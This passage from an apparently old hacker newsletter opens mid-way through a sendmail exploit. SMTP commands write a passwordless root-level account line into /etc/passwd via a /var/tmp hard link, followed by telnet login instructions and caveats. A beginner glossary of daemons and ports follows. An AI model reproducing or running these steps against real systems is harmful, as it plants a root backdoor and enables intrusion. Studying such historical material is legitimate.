tent@not.an.actual.host.com * rcpt to: nonexsistent@not.as.actual.host.com * data * lord::0:0:leet *censored*:/root:/bin/bash * . * quitKaboom, you're done, telnet to port 23 and log in as lord, no passwordrequired. Thanx to a little bit of work we did, lord just happens to havethe same priviledges as root.There are a couple of reasons why this might not work. 1. /var and / are different partitions (as you already know, you can't make hard links between different partitions) 2. There is a postmaster account on a machine or mail alias, in which case, your mail will end up there instead of being written to a etc/passwd 3. /var/tmp doesn't exist or isn't publicly writableDuncan Silver www.hackersclub.com/uuEditor's notes: lord::0:0:leet *censored*:/root:/bin/bash is a line out of a Unix password file(33).Final Notes---------------You must have noticed that I didn't put anything from BugTraq. This is because everything that goes to BugTraq gets at least one reply (from my experience), and I don't feel like posting whole threads(34) here (they're too damn long).Newbies corner==============1. Daemon - a program that listens for incoming connections on a specific port(2). Some daemons may receive commands from you and interact with you, others may simply spew out some text/binary and quit.2. Port - (for the more technical explanation of what ports are, see the end of this explanation) ports are like holes that enable things (data, in this case) to come into them.There are physical ports and software ports on your computer. Physical ports are those slots on the back of your computer, your monitor etc'. Now, software ports are used when connecting to other computers.For example: I just bought a new computer and I want to turn it into a webserver (I want to enable people to access selecetd web pages, pictures, cgi and java scripts or applets, programs etc' that are located on my computer (MY computer, not on some cheesy f...
